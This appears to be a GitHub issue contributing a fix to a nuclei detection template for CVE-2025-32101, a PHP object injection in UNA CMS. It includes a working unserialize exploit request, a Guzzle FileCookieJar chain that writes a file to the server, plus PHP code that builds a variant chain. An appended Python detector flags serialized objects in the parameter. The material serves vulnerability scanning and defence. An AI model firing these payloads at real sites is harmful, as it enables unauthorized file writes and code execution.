[TEMPLATE CONTRIBUTION] Fix template for CVE-2025-32101 #11933

@EgidioRomano

Is there an existing template for this?

  • I have searched the existing templates.

Nuclei Template

id: CVE-2025-32101

info:
  name: UNA CMS <= 14.0.0-RC4 - PHP Object Injection
  author: iamnoooob,rootxharsh,pdresearch,egix
  severity: critical
  description: |
    The vulnerability is located in the /template/scripts/BxBaseMenuSetAclLevel.php script. Specifically, within the BxBaseMenuSetAclLevel::getCode() method. When calling this method, user input passed through the "profile_id" POST parameter is not properly sanitized before being used in a call to the unserialize() PHP function. This can be exploited by remote, unauthenticated attackers to inject arbitrary PHP objects into the application scope, allowing them to perform a variety of attacks, such as writing and executing arbitrary PHP code.
  reference:
    - https://www.exploit-db.com/exploits/52139
    - https://karmainsecurity.com/KIS-2025-01
  metadata:
    verified: true
    max-request: 2
    fofa-query: body="Powered by UNA"
  tags: cve,cve2025,una-cms,php,rce

http:
  - raw:
      - |
        POST /menu.php HTTP/1.1
        Host: {{Hostname}}
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded

        o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id=O%3A31%3A%22GuzzleHttp%5CCookie%5CFileCookieJar%22%3A3%3A%7Bs%3A40%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00cookies%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A27%3A%22GuzzleHttp%5CCookie%5CSetCookie%22%3A1%3A%7Bs%3A33%3A%22%00GuzzleHttp%5CCookie%5CSetCookie%00data%22%3Ba%3A2%3A%7Bs%3A7%3A%22Expires%22%3Bs%3A0%3A%22%22%3Bs%3A5%3A%22Value%22%3Bs%3A10%3A%22VULNERABLE%22%3B%7D%7D%7Ds%3A41%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00filename%22%3Bs%3A25%3A%22.%2Fcache_public%2Fnuclei.txt%22%3Bs%3A52%3A%22%00GuzzleHttp%5CCookie%5CFileCookieJar%00storeSessionCookies%22%3Bb%3A1%3B%7D

    matchers:
      - type: status
        internal: true
        status:
          - 200

  - raw:
      - |
        GET /cache_public/nuclei.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body
        words:
          - 'VULNERABLE'

Relevant dumped responses

Anything else?

At the moment, the template for CVE-2025-32101 will work only when the affected UNA CMS instance is running on Apache. To make a more generic test, which will work with all web servers, we can use the following "POP chain":

<?php

class GuzzleHttp_Cookie_SetCookie
{
	private $data = ['Expires' => '', 'Value' => 'VULNERABLE'];
}

class GuzzleHttp_Cookie_FileCookieJar
{
	private $cookies, $filename = './cache_public/nuclei.txt', $storeSessionCookies = true;
	
	function __construct()
	{
		$this->cookies = [new GuzzleHttp_Cookie_SetCookie];
	}
}

$chain = serialize(new GuzzleHttp_Cookie_FileCookieJar);
$chain = str_replace('GuzzleHttp_Cookie_SetCookie', 'GuzzleHttp\Cookie\SetCookie', $chain);
$chain = str_replace('GuzzleHttp_Cookie_FileCookieJar', 'GuzzleHttp\Cookie\FileCookieJar', $chain);

print urlencode($chain);

This will try to write a new file under ./cache_public/nuclei.txt, containing the string VULNERABLE. So, just checking the presence of this file, and matching that string, is enough to test the vulnerability.
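A defender-side counterpart to the template's first request, as an added example that is not part of the original issue or of the nuclei-templates project: it flags POSTs to /menu.php whose "profile_id" parameter decodes to a PHP serialized object instead of a plain identifier. The function names are hypothetical, and the sample request bodies are constructed, using a harmless stdClass object.

```python
import re
from urllib.parse import parse_qs

# PHP serialize() object markers: O:<len>:"Class":<n>: (object) and
# C:<len>:"Class":<n>: (Serializable). An optional '+' before the length is
# tolerated because older PHP versions accepted it. The marker is matched at
# the start of the value or right after ';' or '{', so objects nested inside
# arrays or properties are found too.
PHP_OBJECT = re.compile(
    r'(?:^|[;{])[OC]:\+?\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":\d+:'
)

def serialized_classes(value):
    """Return the class names of PHP serialized objects found in a decoded value."""
    return PHP_OBJECT.findall(value)

def inspect_request(method, path, body):
    """Return findings for a POST to /menu.php carrying an object in profile_id."""
    if method.upper() != "POST" or path.split("?", 1)[0] != "/menu.php":
        return None
    # parse_qs percent-decodes the form body, including %00 and %5C
    params = parse_qs(body, keep_blank_values=True)
    findings = []
    for raw in params.get("profile_id", []):
        classes = serialized_classes(raw)
        if classes:
            findings.append({"param": "profile_id", "classes": classes})
    return findings or None

# Constructed sample bodies (not captured traffic)
PREFIX = "o=sys_set_acl_level&a=SetAclLevel&level_id=1&profile_id="
SAMPLES = {
    "plain id": PREFIX + "42",
    "top-level object": PREFIX + "O%3A8%3A%22stdClass%22%3A0%3A%7B%7D",
    "object inside array":
        PREFIX + "a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%7D",
    "namespaced class": PREFIX + "O%3A7%3A%22Foo%5CBar%22%3A0%3A%7B%7D",
}

def scan_samples():
    """Run the check over every constructed sample and return name -> result."""
    return {name: inspect_request("POST", "/menu.php", body)
            for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, result in scan_samples().items():
        print(f"{name}: {result}")
```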
